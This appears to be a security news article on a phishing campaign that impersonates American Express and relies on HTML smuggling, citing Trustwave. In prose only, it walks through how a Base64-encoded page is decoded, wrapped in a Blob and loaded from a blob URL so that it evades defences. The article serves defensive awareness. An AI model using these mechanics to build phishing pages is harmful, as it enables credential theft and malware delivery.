Researchers discovered a phishing email impersonating American Express that used HTML smuggling to redirect users to a malicious website, where the email contained a clickable link that led to a simple redirector, which then redirected users to the final phishing site.
The HTML file loads an external JavaScript file that contains a long Base64-encoded string, which is decoded to reveal the actual HTML phishing page, demonstrating an HTML smuggling technique.
The document-ready function waits for the page to load before executing code within it. The encoded HTML string is decoded using the atob function, revealing the plain text HTML code of the phishing page.
While the function openFileURL creates a Blob object from the decoded HTML content and generates a URL referencing the Blob, which then uses this URL to open the file in a new window for viewing or downloading.
The code changes the current page’s URL to a blob URL containing HTML content, causing the browser to load it, and to prevent memory leaks, the blob URL is revoked after a brief delay using setTimeout().
The script converts a Base64-encoded HTML string into a Blob object, creates a URL for this Blob, and loads the resulting HTML content in the current browser window, effectively displaying the decoded content as a webpage.
Cybercriminals exploit Blob URLs through HTML smuggling to create malicious files within the browser using JavaScript, which allows them to bypass server-side security measures and deliver harmful content directly to the user.
They exploit JavaScript to create malicious files locally on user devices, which generated within the browser, evade traditional security measures that monitor external downloads, making them difficult to detect and block.
Malicious files generated locally within a browser can be used to deliver harmful payloads disguised as legitimate content, making them difficult to detect and block, which can exploit browser vulnerabilities and are harder to trace due to their localized nature.
According to Trustwave, the phishing pages employ HTML smuggling to deceive users into believing they are interacting with legitimate websites like DocuSign and Microsoft.
By embedding malicious code within seemingly innocuous HTML elements, these pages trick victims into divulging sensitive information or downloading malware.
HTML smuggling is a growing security threat where phishing content is hidden within seemingly harmless HTML files, which uses techniques like blob URLs to reference hidden blob data in JavaScript, allowing it to bypass traditional security measures and deliver malicious content to unsuspecting users.
It will likely become more sophisticated in phishing attacks. Expect more convincing fake emails with hidden HTML code, requiring more user interaction but still being effective.
